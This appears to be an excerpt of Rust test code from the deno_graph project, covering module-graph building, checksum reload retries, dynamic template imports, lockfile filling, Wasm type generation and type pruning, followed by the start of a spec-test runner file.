            mtime: None,
            content: br#"{
  "exports": { ".": "./math.wasm" },
  "manifest": {
    "/math.wasm": {
      "size": 123,
      "checksum": "sha256-b8059cfb1ea623e79efbf432db31595df213c99c6534c58bec9d5f5e069344df"
    }
  },
  "moduleGraph2": {
    "/math.wasm": {
      "dependencies": []
    }
  }
}"#
            .to_vec()
            .into(),
          }))
        }),
        // the wasm bytes themselves; only served for non-cache-only loads
        "https://jsr.io/@scope/a/1.0.0/math.wasm" => Box::pin(async move {
          if options.cache_setting == CacheSetting::Only {
            Ok(None)
          } else {
            Ok(Some(LoadResponse::Module {
              specifier: specifier.clone(),
              maybe_headers: None,
              mtime: None,
              content: std::fs::read("./tests/testdata/math.wasm")
                .unwrap()
                .into(),
            }))
          }
        }),
        _ => unreachable!(),
      }
    }
  }
  {
    let loader = TestLoader;
    let mut graph = ModuleGraph::new(GraphKind::All);
    graph
      .build(
        vec![Url::parse("file:///main.ts").unwrap()],
        Vec::new(),
        &loader,
        Default::default(),
      )
      .await;
    graph.valid().unwrap();
  }
}
#[tokio::test]
async fn test_checksum_error_force_refresh() {
  // When a cached load fails its checksum integrity check, the builder should
  // retry the same specifier with `CacheSetting::Reload`. This loader fails
  // every `CacheSetting::Use` request with a checksum mismatch and only
  // succeeds on reload; the request log at the end asserts the
  // use-then-reload pattern for each module.
  #[derive(Default)]
  struct TestLoader {
    requests: RefCell<Vec<(String, CacheSetting)>>,
  }
  impl deno_graph::source::Loader for TestLoader {
    fn load(
      &self,
      specifier: &ModuleSpecifier,
      options: LoadOptions,
    ) -> LoadFuture {
      // record every request for the final assertion
      self
        .requests
        .borrow_mut()
        .push((specifier.to_string(), options.cache_setting));
      let specifier = specifier.clone();
      match specifier.as_str() {
        "https://deno.land/mod.ts" => Box::pin(async move {
          match options.cache_setting {
            CacheSetting::Only => unreachable!(),
            CacheSetting::Use => {
              // simulate a corrupted cache entry
              Err(LoadError::ChecksumIntegrity(ChecksumIntegrityError {
                actual: "actual".to_string(),
                expected: "expected".to_string(),
              }))
            }
            CacheSetting::Reload => Ok(Some(LoadResponse::Module {
              specifier: specifier.clone(),
              maybe_headers: None,
              mtime: None,
              content: b"import './other.js';".to_vec().into(),
            })),
          }
        }),
        "https://deno.land/other.js" => Box::pin(async move {
          match options.cache_setting {
            CacheSetting::Only => unreachable!(),
            CacheSetting::Use => {
              // simulate a corrupted cache entry
              Err(LoadError::ChecksumIntegrity(ChecksumIntegrityError {
                actual: "actual".to_string(),
                expected: "expected".to_string(),
              }))
            }
            CacheSetting::Reload => Ok(Some(LoadResponse::Module {
              specifier: specifier.clone(),
              maybe_headers: None,
              mtime: None,
              content: b"console.log(1);".to_vec().into(),
            })),
          }
        }),
        _ => unreachable!(),
      }
    }
  }
  let loader = TestLoader::default();
  let mut graph = ModuleGraph::new(GraphKind::All);
  graph
    .build(
      vec![Url::parse("https://deno.land/mod.ts").unwrap()],
      Vec::new(),
      &loader,
      Default::default(),
    )
    .await;
  graph.valid().unwrap();
  // each module: first a failed cached load, then a successful reload
  assert_eq!(
    *loader.requests.borrow(),
    vec![
      ("https://deno.land/mod.ts".to_string(), CacheSetting::Use),
      ("https://deno.land/mod.ts".to_string(), CacheSetting::Reload),
      ("https://deno.land/other.js".to_string(), CacheSetting::Use),
      (
        "https://deno.land/other.js".to_string(),
        CacheSetting::Reload
      ),
    ]
  );
}
#[tokio::test]
async fn test_dynamic_imports_with_template_arg() {
  // Exercises graph expansion of dynamic imports whose specifier is a
  // template literal containing expressions (e.g. `./${x}`): the builder
  // probes the provided file system for candidate modules. Each case below
  // lists the files that exist and the specifiers expected to end up in the
  // graph (beyond the entrypoint itself).
  //
  // Runs the given entrypoint `code` against the given `files` (specifier,
  // text pairs) and asserts the resulting graph's specifiers. On Windows the
  // file:/// urls are rewritten onto the C: drive so they are valid paths.
  async fn run_test(
    code: &str,
    files: Vec<(&str, &str)>,
    expected_specifiers: Vec<&str>,
  ) {
    let mut loader = MemoryLoader::default();
    let sys = InMemorySys::default();
    for (specifier, text) in &files {
      let specifier = if cfg!(windows) {
        specifier.replace("file:///", "file:///C:/")
      } else {
        specifier.to_string()
      };
      let specifier = ModuleSpecifier::parse(&specifier).unwrap();
      let path = deno_path_util::url_to_file_path(&specifier).unwrap();
      // mirror the file into the in-memory fs so directory probing works
      sys.fs_create_dir_all(path.parent().unwrap()).unwrap();
      sys.fs_write(&path, text).unwrap();
      loader.add_source_with_text(specifier, text);
    }
    let entrypoint = if cfg!(windows) {
      "file:///C:/dev/main.ts"
    } else {
      "file:///dev/main.ts"
    };
    loader.add_source_with_text(entrypoint, code);
    let mut graph = ModuleGraph::new(GraphKind::All);
    graph
      .build(
        vec![Url::parse(entrypoint).unwrap()],
        Vec::new(),
        &loader,
        BuildOptions {
          file_system: &sys,
          ..Default::default()
        },
      )
      .await;
    graph.valid().unwrap();
    // normalize windows paths back and drop the entrypoint for comparison
    let specifiers = graph
      .specifiers()
      .map(|s| {
        if cfg!(windows) {
          s.0.as_str().replace("file:///C:/", "file:///")
        } else {
          s.0.to_string()
        }
      })
      .filter(|s| s != "file:///dev/main.ts")
      .collect::<Vec<_>>();
    assert_eq!(specifiers, expected_specifiers);
  }

  // relative with ./
  run_test(
    "
    await import(`./${test}`);
    ",
    vec![
      ("file:///dev/a/mod.ts", ""),
      ("file:///dev/a/sub_dir/a.ts", ""),
      ("file:///dev/b.ts", ""),
    ],
    vec![
      "file:///dev/a/mod.ts",
      "file:///dev/a/sub_dir/a.ts",
      "file:///dev/b.ts",
    ],
  )
  .await;
  // relative with sub dir
  run_test(
    "
    await import(`./a/${test}`);
    ",
    vec![
      ("file:///dev/a/mod.ts", ""),
      ("file:///dev/a/sub_dir/a.ts", ""),
      ("file:///dev/b.ts", ""),
    ],
    vec!["file:///dev/a/mod.ts", "file:///dev/a/sub_dir/a.ts"],
  )
  .await;
  run_test(
    "
    // should not match these two because it does not end in a slash
    await import(`./b${test}`);
    await import(`./c/a${test}`);
    ",
    vec![
      ("file:///dev/a/mod.ts", ""),
      ("file:///dev/b.ts", ""),
      ("file:///dev/c/a.ts", ""),
      ("file:///dev/c/a/a.ts", ""),
    ],
    vec![],
  )
  .await;
  run_test(
    "
    await import(`./d/other/${test}/main.json`, {
      with: {
        type: 'json',
      },
    });
    await import(`./d/sub/${test}`);
    ",
    vec![
      ("file:///dev/d/a.ts", ""),
      ("file:///dev/d/sub/main.json", ""),
      ("file:///dev/d/sub/a.ts", ""),
      ("file:///dev/d/sub/a.js", ""),
      ("file:///dev/d/sub/a.mjs", ""),
      ("file:///dev/d/sub/a.mts", ""),
      // should not match because it's a declaration file
      ("file:///dev/d/sub/a.d.ts", ""),
      ("file:///dev/d/other/json/main.json", ""),
      ("file:///dev/d/other/json/main2.json", ""),
    ],
    vec![
      "file:///dev/d/other/json/main.json",
      "file:///dev/d/sub/a.js",
      "file:///dev/d/sub/a.mjs",
      "file:///dev/d/sub/a.mts",
      "file:///dev/d/sub/a.ts",
    ],
  )
  .await;
  // only matching one extension
  run_test(
    "
    await import(`./d/sub2/${test}.mjs`);
    ",
    vec![
      ("file:///dev/d/sub2/a.ts", ""),
      ("file:///dev/d/sub2/a.js", ""),
      ("file:///dev/d/sub2/a.mjs", ""),
      ("file:///dev/d/sub2/a.mts", ""),
    ],
    vec!["file:///dev/d/sub2/a.mjs"],
  )
  .await;
  // file specifiers
  run_test(
    if cfg!(windows) {
      "await import(`file:///C:/dev/other/${test}`);"
    } else {
      "await import(`file:///dev/other/${test}`);"
    },
    vec![("file:///dev/other/mod.ts", ""), ("file:///dev/b.ts", "")],
    vec!["file:///dev/other/mod.ts"],
  )
  .await;
  // multiple exprs with same string between
  run_test(
    "await import(`./other/${test}/other/${test}/mod.ts`);",
    vec![
      ("file:///dev/other/mod.ts", ""),
      ("file:///dev/other/other/mod.ts", ""),
      ("file:///dev/other/test/other/mod.ts", ""),
      ("file:///dev/other/test/other/test/mod.ts", ""),
      ("file:///dev/other/test/other/test/other/mod.ts", ""),
      ("file:///dev/b.ts", ""),
    ],
    vec![
      "file:///dev/other/test/other/test/mod.ts",
      "file:///dev/other/test/other/test/other/mod.ts",
    ],
  )
  .await;
  // finding itself
  run_test(
    "await import(`./${expr}`);",
    vec![
      ("file:///dev/main.ts", ""), // self
      ("file:///dev/other.ts", ""),
    ],
    // should not have "file:///dev/" here
    vec!["file:///dev/other.ts"],
  )
  .await;
  // root directory should be ignored because this is likely
  // not wanted because it would include the entire file system
  run_test(
    "await import(`file:///${expr}`);",
    vec![("file:///main.ts", ""), ("file:///dev/other.ts", "")],
    vec![],
  )
  .await;
  // won't search node_modules, vendor, or hidden folders
  run_test(
    "await import(`./${test}/mod.ts`);",
    vec![
      ("file:///dev/other/.git/mod.ts", ""),
      ("file:///dev/other/node_modules/mod.ts", ""),
      ("file:///dev/other/sub_dir/mod.ts", ""),
      ("file:///dev/other/vendor/mod.ts", ""),
      ("file:///dev/other/mod.ts", ""),
    ],
    vec![
      "file:///dev/other/mod.ts",
      "file:///dev/other/sub_dir/mod.ts",
    ],
  )
  .await;
}
#[tokio::test]
async fn test_fill_from_lockfile() {
  // `fill_from_lockfile` seeds a fresh graph with lockfile redirects and jsr
  // package-req -> version mappings. A subsequent build may still move an
  // unconstrained mapping to the highest loaded matching version
  // (1.0.0 -> 1.0.1 here).
  let mut graph = ModuleGraph::new(GraphKind::All);
  let redirects = [("https://example.com", "https://example.com/final")];
  let specifiers = [
    (
      JsrDepPackageReq::from_str("jsr:@scope/example").unwrap(),
      "1.0.0",
    ),
    (
      JsrDepPackageReq::from_str("jsr:@scope/example@1.0.1").unwrap(),
      "1.0.1",
    ),
  ];
  graph.fill_from_lockfile(FillFromLockfileOptions {
    redirects: redirects.iter().copied(),
    package_specifiers: specifiers.iter().map(|(k, v)| (k, *v)),
  });
  // the lockfile redirect is now present in the graph
  assert_eq!(
    graph
      .redirects
      .get(&Url::parse("https://example.com").unwrap())
      .unwrap()
      .as_str(),
    "https://example.com/final"
  );
  // the unconstrained req maps to the version recorded in the lockfile
  assert_eq!(
    *graph
      .packages
      .mappings()
      .get(&PackageReq::from_str("@scope/example").unwrap())
      .unwrap(),
    PackageNv::from_str("@scope/example@1.0.0").unwrap(),
  );
  let mut loader = MemoryLoader::default();
  loader.add_jsr_package_info(
    "@scope/example",
    &JsrPackageInfo {
      versions: vec![
        (
          deno_semver::Version::parse_standard("1.0.0").unwrap(),
          JsrPackageInfoVersion::default(),
        ),
        (
          deno_semver::Version::parse_standard("1.0.1").unwrap(),
          JsrPackageInfoVersion::default(),
        ),
      ]
      .into_iter()
      .collect(),
    },
  );
  loader.add_jsr_version_info(
    "@scope/example",
    "1.0.0",
    &JsrPackageVersionInfo {
      exports: serde_json::json!({
        ".": "./mod.ts"
      }),
      ..Default::default()
    },
  );
  loader.add_jsr_version_info(
    "@scope/example",
    "1.0.1",
    &JsrPackageVersionInfo {
      exports: serde_json::json!({
        ".": "./mod.ts"
      }),
      ..Default::default()
    },
  );
  loader.add_source_with_text(
    "https://jsr.io/@scope/example/1.0.0/mod.ts",
    "// This is version 1.0.0 of this package.",
  );
  loader.add_source_with_text(
    "https://jsr.io/@scope/example/1.0.1/mod.ts",
    "// This is version 1.0.1 of this package.",
  );
  graph
    .build(
      // This will match 1.0.1 because it's the highest loaded matching
      // version, even though this specifier is said as locking to 1.0.1
      // in the lockfile
      vec![Url::parse("jsr:/@scope/example").unwrap()],
      Vec::new(),
      &loader,
      Default::default(),
    )
    .await;
  graph.valid().unwrap();
  let modules = graph.modules().collect::<Vec<_>>();
  assert_eq!(modules.len(), 1);
  let module = modules.into_iter().next().unwrap().js().unwrap();
  // the 1.0.1 module was the one actually loaded
  assert_eq!(
    module.source.text.as_ref(),
    "// This is version 1.0.1 of this package."
  );
  // now it will be automatically updated to 1.0.1 instead of 1.0.0
  assert_eq!(
    *graph
      .packages
      .mappings()
      .get(&PackageReq::from_str("@scope/example").unwrap())
      .unwrap(),
    PackageNv::from_str("@scope/example@1.0.1").unwrap(),
  );
}
#[tokio::test]
async fn test_json_root() {
  // Verifies which specifiers become graph roots when a JSON module is
  // reached through a jsr export and through chains of HTTP redirects:
  // a specifier used as a root stays a root even if it redirects, but a
  // specifier that was only an intermediate redirect hop does not.
  let mut loader = MemoryLoader::default();
  loader.add_source_with_text(
    "https://jsr.io/@scope/example/1.0.0/data.json",
    "{ \"a\": 1 }",
  );
  // redirect3 -> redirect2 -> redirect -> data.json
  for (from, to) in [
    (
      "https://deno.land/x/redirect",
      "https://jsr.io/@scope/example/1.0.0/data.json",
    ),
    ("https://deno.land/x/redirect2", "https://deno.land/x/redirect"),
    ("https://deno.land/x/redirect3", "https://deno.land/x/redirect2"),
  ] {
    loader
      .add_source(from, deno_graph::source::Source::<_, [u8; 0]>::Redirect(to));
  }
  loader.add_jsr_package_info(
    "@scope/example",
    &JsrPackageInfo {
      versions: vec![(
        deno_semver::Version::parse_standard("1.0.0").unwrap(),
        JsrPackageInfoVersion::default(),
      )]
      .into_iter()
      .collect(),
    },
  );
  loader.add_jsr_version_info(
    "@scope/example",
    "1.0.0",
    &JsrPackageVersionInfo {
      exports: serde_json::json!({
        "./json-export": "./data.json"
      }),
      ..Default::default()
    },
  );
  // build incrementally with three separate roots, validating after each
  let mut graph = ModuleGraph::new(GraphKind::All);
  for root in [
    "jsr:/@scope/example@^1.0.0/json-export",
    "https://deno.land/x/redirect",
    "https://deno.land/x/redirect3",
  ] {
    graph
      .build(
        vec![Url::parse(root).unwrap()],
        Vec::new(),
        &loader,
        Default::default(),
      )
      .await;
    graph.valid().unwrap();
  }
  assert_eq!(
    graph.roots.iter().map(|s| s.as_str()).collect::<Vec<_>>(),
    vec![
      "jsr:/@scope/example@^1.0.0/json-export",
      "https://deno.land/x/redirect",
      "https://deno.land/x/redirect3", // not 2
    ]
  );
}
#[tokio::test]
async fn test_wasm_math() {
  // Build a graph rooted at a TS module that imports a Wasm module, then
  // verify the .d.ts surface generated for the Wasm exports.
  let mut loader = MemoryLoader::default();
  loader.add_bytes_source(
    "file:///project/math.wasm",
    std::fs::read("tests/testdata/math.wasm").unwrap(),
  );
  loader.add_source_with_text(
    "file:///project/main.ts",
    "import { add } from './math.wasm'; console.log(add(1, 2));",
  );
  let mut graph = ModuleGraph::new(GraphKind::All);
  let roots = vec![Url::parse("file:///project/main.ts").unwrap()];
  graph
    .build(roots, Vec::new(), &loader, Default::default())
    .await;
  graph.valid().unwrap();
  let wasm_url = Url::parse("file:///project/math.wasm").unwrap();
  let deno_graph::Module::Wasm(wasm_module) = graph.get(&wasm_url).unwrap()
  else {
    unreachable!()
  };
  assert_eq!(
    wasm_module.source_dts.to_string(),
    "export declare const memory: WebAssembly.Memory;
export declare function add(arg0: number, arg1: number): number;
export declare function subtract(arg0: number, arg1: number): number;
export declare const __data_end: number;
export declare const __heap_base: number;
"
  );
}
#[tokio::test]
async fn test_wasm_math_with_import() {
  // Like test_wasm_math, but the Wasm module itself imports JS functions:
  // the generated .d.ts should begin with an import statement and the
  // imported TS module should be pulled into the graph.
  let mut loader = MemoryLoader::default();
  loader.add_bytes_source(
    "file:///project/math.wasm",
    std::fs::read("tests/testdata/math_with_import.wasm").unwrap(),
  );
  loader.add_source_with_text(
    "file:///project/main.ts",
    "import { add } from './math.wasm'; console.log(add(1, 2));",
  );
  loader.add_source_with_text(
    "file:///project/math.ts",
    "export function add(a: number, b: number): number { return a + b; }\n export function subtract(a: number, b: number): number { return a - b; }",
  );
  let mut graph = ModuleGraph::new(GraphKind::All);
  let roots = vec![Url::parse("file:///project/main.ts").unwrap()];
  graph
    .build(roots, Vec::new(), &loader, Default::default())
    .await;
  graph.valid().unwrap();
  let wasm_url = Url::parse("file:///project/math.wasm").unwrap();
  let deno_graph::Module::Wasm(wasm_module) = graph.get(&wasm_url).unwrap()
  else {
    unreachable!()
  };
  assert_eq!(
    wasm_module.source_dts.to_string(),
    "import { \"js_add\" as __deno_wasm_import_0__, \"js_subtract\" as __deno_wasm_import_1__ } from \"./math.ts\";
export declare const memory: WebAssembly.Memory;
export declare function add(arg0: number, arg1: number): number;
export declare function subtract(arg0: number, arg1: number): number;
export declare const __data_end: number;
export declare const __heap_base: number;
"
  );
  // the import discovered inside the Wasm module must end up in the graph
  let math_ts = Url::parse("file:///project/math.ts").unwrap();
  assert!(graph.get(&math_ts).is_some());
}
#[tokio::test]
async fn test_prune() {
  // Builds a graph containing a type-only import, a static code import, and
  // dynamic imports (one of which reaches an npm package), then calls
  // `prune_types()` and asserts:
  // - the graph kind drops to `CodeOnly`
  // - the type-only dependency keeps its bare specifier but loses its
  //   resolution ("./types.ts" has no "code"/"type" entry below)
  // - code/dynamic dependencies and the npm package survive
  let mut graph = ModuleGraph::new(GraphKind::All);
  let mut loader = MemoryLoader::default();
  // NOTE: the fixture below is flush-left on purpose — the expected spans in
  // the JSON assertion depend on exact line/character positions (and "size"
  // on the exact byte length).
  loader.add_source_with_text(
    "file:///project/mod.ts",
    r#"
import type { Types } from "./types.ts";
import { Code } from "./code.ts";

function test() {
  await import("./dynamic.ts");
}

await import("https://example.com/main.ts");
"#,
  );
  loader.add_source_with_text("file:///project/types.ts", "");
  loader.add_source_with_text("file:///project/code.ts", "");
  // fix: previously written with a triple slash ("https:///example.com/…"),
  // which only worked because URL parsing normalizes the extra slash away
  loader.add_source_with_text("https://example.com/main.ts", "");
  loader.add_source_with_text(
    "file:///project/dynamic.ts",
    "function test() { import ('npm:chalk@1.0.0'); }",
  );
  graph
    .build(
      vec![Url::parse("file:///project/mod.ts").unwrap()],
      Vec::new(),
      &loader,
      BuildOptions {
        npm_resolver: Some(&TestNpmResolver),
        ..Default::default()
      },
    )
    .await;
  graph.valid().unwrap();
  graph.prune_types();
  assert_eq!(graph.graph_kind(), GraphKind::CodeOnly);
  // the npm package reached via the dynamic import is retained
  assert_eq!(
    graph.npm_packages,
    IndexSet::from([PackageNv::from_str("chalk@1.0.0").unwrap()])
  );
  assert_eq!(
    json!(graph),
    json!({
      "roots": ["file:///project/mod.ts"],
      "modules": [
        {
          "kind": "esm",
          "size": 0,
          "mediaType": "TypeScript",
          "specifier": "file:///project/code.ts"
        },
        {
          "kind": "esm",
          "dependencies": [{
            "specifier": "npm:chalk@1.0.0",
            "code": {
              "specifier": "npm:chalk@1.0.0",
              "resolutionMode": "import",
              "span": {
                "start": { "line": 0, "character": 26 },
                "end": { "line": 0, "character": 43 },
              }
            },
            "isDynamic": true
          }],
          "size": 47,
          "mediaType": "TypeScript",
          "specifier": "file:///project/dynamic.ts",
        },
        {
          "kind": "esm",
          "dependencies": [
            { "specifier": "./types.ts" },
            {
              "specifier": "./code.ts",
              "code": {
                "specifier": "file:///project/code.ts",
                "resolutionMode": "import",
                "span": {
                  "start": { "line": 2, "character": 21 },
                  "end": { "line": 2, "character": 32 }
                }
              }
            },
            {
              "specifier": "./dynamic.ts",
              "code": {
                "specifier": "file:///project/dynamic.ts",
                "resolutionMode": "import",
                "span": {
                  "start": { "line": 5, "character": 15 },
                  "end": { "line": 5, "character": 29 }
                }
              },
              "isDynamic": true,
            },
            {
              "specifier": "https://example.com/main.ts",
              "code": {
                "specifier": "https://example.com/main.ts",
                "resolutionMode": "import",
                "span": {
                  "start": { "line": 8, "character": 13 },
                  "end": { "line": 8, "character": 42 }
                }
              },
              "isDynamic": true
            },
          ],
          "size": 175,
          "mediaType": "TypeScript",
          "specifier": "file:///project/mod.ts"
        },
        {
          "kind": "esm",
          "size": 0,
          "mediaType": "TypeScript",
          "specifier": "https://example.com/main.ts",
        },
        {
          "kind": "npm",
          "specifier": "npm:/chalk@1.0.0"
        }
      ],
      "redirects": {
        "npm:chalk@1.0.0": "npm:/chalk@1.0.0"
      }
    })
  );
}
#[tokio::test]
async fn test_reload() {
let mut graph = ModuleGraph::new(GraphKind::All);
let mut loader = MemoryLoader::default();
loader.add_source_with_text("file:///project/mod.ts", r#"import "./a.ts";"#);
loader.add_source_with_text("file:///project/a.ts", "");
graph
.build(
vec![Url::parse("file:///project/mod.ts").unwrap()],
Vec::new(),
&loader,
BuildOptions {
npm_resolver: Some(&TestNpmResolver),
..Default::default()
},
)
.await;
loader.add_source_with_text("file:///project/a.ts", "await import('./b.ts')");
loader
.add_source_with_text("file:///project/b.ts", "import 'npm:chalk@1.0.0';");
graph
.reload(
vec![Url::parse("file:///project/a.ts").unwrap()],
&loader,
BuildOptions {
npm_resolver: Some(&TestNpmResolver),
..Default::default()
},
)
.await;
graph.valid().unwrap();
assert_eq!(
graph.npm_packages,
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/tests/specs_test.rs | tests/specs_test.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![allow(clippy::disallowed_methods)]
use std::borrow::Cow;
use std::cell::OnceCell;
use std::collections::BTreeMap;
use std::panic::AssertUnwindSafe;
use std::collections::HashMap;
use std::fmt::Write;
use std::path::Path;
use std::path::PathBuf;
use std::rc::Rc;
use deno_ast::EmitOptions;
use deno_ast::EmittedSourceText;
use deno_ast::SourceMap;
use deno_ast::diagnostics::Diagnostic;
use deno_ast::emit;
use deno_graph::WorkspaceMember;
use deno_graph::fast_check::FastCheckCacheModuleItem;
use deno_graph::packages::NewestDependencyDateOptions;
use deno_graph::source::DEFAULT_JSR_URL;
use deno_graph::source::LoaderChecksum;
use deno_graph::source::Source;
use deno_graph::source::recommended_registry_package_url;
use deno_graph::source::recommended_registry_package_url_to_nv;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use file_test_runner::RunOptions;
use file_test_runner::TestResult;
use file_test_runner::collect_and_run_tests;
use file_test_runner::collection::CollectOptions;
use file_test_runner::collection::CollectedTest;
use file_test_runner::collection::strategies::TestPerFileCollectionStrategy;
use helpers::TestLoader;
use indexmap::IndexMap;
use pretty_assertions::assert_eq;
use serde::Deserialize;
use serde::Serialize;
use serde::de::DeserializeOwned;
use url::Url;
use crate::helpers::TestBuilder;
mod helpers;
fn main() {
  // set log level with RUST_LOG env var (ex. `RUST_LOG=trace`)
  env_logger::builder()
    .filter(Some("tracing::span"), log::LevelFilter::Off)
    .filter(Some("swc_ecma_codegen"), log::LevelFilter::Off)
    .init();

  // Disable colors so that deno_ast diagnostics do not contain escape sequences.
  // TODO: Audit that the environment access only happens in single-threaded code.
  unsafe { std::env::set_var("NO_COLOR", "true") };

  collect_and_run_tests(
    CollectOptions {
      base: "tests/specs".into(),
      strategy: Box::new(TestPerFileCollectionStrategy {
        // Match any file under a `specs/graph/` or `specs/symbols/` directory
        // (either path separator). Fixes two regex typos: `^*.` -> `^.*` and
        // the malformed non-capturing group `(:?…)` -> `(?:…)`.
        file_pattern: Some(
          "^.*[/\\\\]specs[/\\\\](?:graph|symbols)[/\\\\].*$".to_owned(),
        ),
      }),
      filter_override: None,
    },
    RunOptions { parallel: true },
    // dispatch each collected file to the matching runner by test name,
    // converting panics into test failures
    |test| {
      if test.name.starts_with("specs::graph") {
        TestResult::from_maybe_panic(AssertUnwindSafe(|| {
          run_graph_test(test);
        }))
      } else if test.name.starts_with("specs::symbols") {
        TestResult::from_maybe_panic(AssertUnwindSafe(|| {
          run_symbol_test(test);
        }))
      } else {
        TestResult::Failed {
          output: format!("Unknown test kind: {}", test.name).into_bytes(),
        }
      }
    },
  )
}
/// Runs a single `specs::graph` test: parses the spec file, builds a module
/// graph from its in-memory files, renders the graph (plus checksums, JSR
/// deps, fast check output and fast check cache contents) as text, and
/// asserts it matches the spec's `output` section.
///
/// Set the `UPDATE=1` environment variable to rewrite the spec file with the
/// actual output instead of failing on a mismatch.
fn run_graph_test(test: &CollectedTest) {
  let file_text = test.read_to_string().unwrap();
  let mut spec = parse_spec(&test.path, file_text);
  spec.fill_jsr_meta_files_with_checksums();

  let mut builder = TestBuilder::new();
  builder.with_loader(|loader| {
    add_spec_files_to_loader(&spec.files, loader);
  });
  builder.workspace_members(spec.workspace_members.clone());
  builder.lockfile_jsr_packages(spec.lockfile_jsr_packages.clone());
  // apply the per-spec options from the `~~ … ~~` header, when present
  if let Some(options) = &spec.options {
    if let Some(entrypoint) = &options.entrypoint {
      builder.entry_point(entrypoint);
    }
    builder.newest_dependency_date(
      options.newest_dependency_date.clone().unwrap_or_default(),
    );
    builder.skip_dynamic_deps(options.skip_dynamic_deps);
    builder.unstable_bytes_imports(options.unstable_bytes_imports);
    builder.unstable_text_imports(options.unstable_text_imports);
    builder.workspace_fast_check(options.workspace_fast_check);
    builder.fast_check_cache(options.fast_check_cache);
    if let Some(checksums) = options.remote_checksums.as_ref() {
      builder.ensure_locker();
      for (specifier, checksum) in checksums {
        builder.add_remote_checksum(specifier, checksum);
      }
    }
    if let Some(checksums) = options.pkg_checksums.as_ref() {
      builder.ensure_locker();
      for (pkg_nv, checksum) in checksums {
        builder.add_pkg_manifest_checksum(pkg_nv, checksum);
      }
    }
  }

  // build on a single-threaded runtime; the loaders are all in-memory
  let rt = tokio::runtime::Builder::new_current_thread()
    .enable_all()
    .build()
    .unwrap();
  let result = rt.block_on(async { builder.build().await });
  let mut output_text = serde_json::to_string_pretty(&result.graph).unwrap();
  output_text.push('\n');
  // include the checksums if non-empty
  if let Some(locker) = &result.locker {
    {
      // BTreeMap for deterministic ordering in the output
      let sorted_checksums = locker.remote().iter().collect::<BTreeMap<_, _>>();
      if !sorted_checksums.is_empty() {
        output_text.push_str("\nremote checksums:\n");
        output_text
          .push_str(&serde_json::to_string_pretty(&sorted_checksums).unwrap());
        output_text.push('\n');
      }
    }
    {
      let sorted_checksums =
        locker.pkg_manifests().iter().collect::<BTreeMap<_, _>>();
      if !sorted_checksums.is_empty() {
        output_text.push_str("\npkg manifest checksums:\n");
        output_text
          .push_str(&serde_json::to_string_pretty(&sorted_checksums).unwrap());
        output_text.push('\n');
      }
    }
  }
  // include the list of jsr dependencies
  let jsr_deps = result
    .graph
    .packages
    .packages_with_deps()
    .map(|(k, deps)| {
      (k.to_string(), {
        let mut deps = deps.map(|d| d.to_string()).collect::<Vec<_>>();
        deps.sort();
        deps
      })
    })
    .filter(|(_, v)| !v.is_empty())
    .collect::<BTreeMap<_, _>>();
  if !jsr_deps.is_empty() {
    output_text.push_str("\njsr deps: ");
    output_text.push_str(&format!("{:#?}", jsr_deps));
    output_text.push('\n');
  }
  // now the fast check modules
  let fast_check_modules = result.graph.modules().filter_map(|module| {
    let module = module.js()?;
    let fast_check = module.fast_check.as_ref()?;
    Some((module, fast_check))
  });
  for (module, fast_check) in fast_check_modules {
    output_text.push_str(&format!("\nFast check {}:\n", module.specifier));
    match fast_check {
      deno_graph::FastCheckTypeModuleSlot::Module(fast_check) => {
        output_text.push_str(&format!(
          "{}\n{}",
          indent(
            &serde_json::to_string_pretty(&fast_check.dependencies).unwrap()
          ),
          if fast_check.source.is_empty() {
            " <empty>".to_string()
          } else {
            indent(&fast_check.source)
          },
        ));
        // emit the .d.ts output (when fast check dts was produced)
        if let Some(dts) = &fast_check.dts {
          let source_map = SourceMap::single(
            module.specifier.clone(),
            module.source.text.to_string(),
          );
          let EmittedSourceText { text, .. } = emit(
            (&dts.program).into(),
            &dts.comments.as_single_threaded(),
            &source_map,
            &EmitOptions {
              remove_comments: false,
              source_map: deno_ast::SourceMapOption::None,
              ..Default::default()
            },
          )
          .unwrap();
          if !text.is_empty() {
            output_text.push_str(&indent("--- DTS ---\n"));
            output_text.push_str(&indent(&text));
          }
          if !dts.diagnostics.is_empty() {
            output_text.push_str(&indent("--- DTS Diagnostics ---\n"));
            let message = dts
              .diagnostics
              .iter()
              .map(|d| {
                let range = d.range();
                format!(
                  "{}\n at {}@{}",
                  d, range.specifier, range.range.start
                )
              })
              .collect::<Vec<_>>()
              .join("\n\n");
            output_text.push_str(&indent(&message));
          }
        }
      }
      deno_graph::FastCheckTypeModuleSlot::Error(diagnostics) => {
        let mut printed_diagnostics = "".to_owned();
        for diagnostic in diagnostics {
          write!(&mut printed_diagnostics, "{}", diagnostic.display()).unwrap();
        }
        output_text.push_str(&indent(&printed_diagnostics));
      }
    }
  }
  // dump the fast check cache contents, when the spec enabled it
  if let Some(fast_check_cache) = result.fast_check_cache.as_ref() {
    output_text.push_str("\n== fast check cache ==\n");
    for (key, item) in fast_check_cache.inner.borrow().iter() {
      output_text.push_str(&format!(
        "{:?}:\n Deps - {}\n Modules: {}\n",
        key,
        serde_json::to_string(&item.dependencies).unwrap(),
        serde_json::to_string(
          &item
            .modules
            .iter()
            .map(|(url, module_item)| (
              url.as_str(),
              match module_item {
                FastCheckCacheModuleItem::Info(_) => "info",
                FastCheckCacheModuleItem::Diagnostic(_) => "diagnostic",
              }
            ))
            .collect::<Vec<_>>()
        )
        .unwrap()
      ));
    }
  }
  if !output_text.ends_with('\n') {
    output_text.push('\n');
  }
  // with UPDATE=1 the expected output is rewritten in place
  let update = std::env::var("UPDATE").as_deref() == Ok("1");
  let spec = if update {
    let mut spec = spec;
    spec.output_file.content = SpecFileContent::Inline(output_text.clone());
    std::fs::write(&test.path, spec.emit()).unwrap();
    spec
  } else {
    spec
  };
  assert_eq!(
    &output_text,
    spec.output_file.content.as_str(),
    "Should be same for {}",
    test.path.display()
  );
}
/// Runs a single `specs::symbols` test: builds the graph described by the
/// spec, performs symbol analysis, and compares the rendered symbol output
/// against the spec's `output` section (or rewrites it when `UPDATE=1`).
fn run_symbol_test(test: &CollectedTest) {
  let mut spec = parse_spec(&test.path, test.read_to_string().unwrap());
  spec.fill_jsr_meta_files_with_checksums();

  let mut builder = TestBuilder::new();
  // The TypesEntrypoint test pairs a JS entry point with a .d.ts types file.
